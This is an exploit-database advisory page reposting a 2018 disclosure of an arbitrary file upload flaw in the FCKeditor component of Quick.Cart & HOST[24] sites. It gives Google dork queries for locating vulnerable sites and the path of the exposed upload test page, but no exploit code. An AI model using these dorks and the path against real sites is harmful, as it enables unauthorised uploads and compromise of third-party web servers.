Powered by Quick.Cart & HOST[24] Fckeditor Arbitrary File Upload Vulnerability

CVE: N/A
Category: CWE-264
Price: $500 - $1,000
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2018-06-26
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
EPSS: 0
EPSSP: 0


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018060297

Below is a copy:

Powered by Quick.Cart & HOST[24] Fckeditor Arbitrary File Upload Vulnerability
#################################################################################################

# Exploit Title : Powered by Quick.Cart & HOST[24] - profi hosting za 24,- Univex.Cz Fckeditor Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 25/06/2018
# Vendor Homepage : opensolution.org ~ univex.cz ~ host24.cz
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]

#################################################################################################

# Google Dorks : 

intext:''Copyright  2008 www.univex.cz''

intext:''Powered by Quick.Cart & HOST[24] - profi hosting za 24,-'' site:cz

# Exploit : .../fckeditor/editor/filemanager/connectors/uploadtest.html

# Path : /files/....

#################################################################################################

# Example Sites :  


################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.
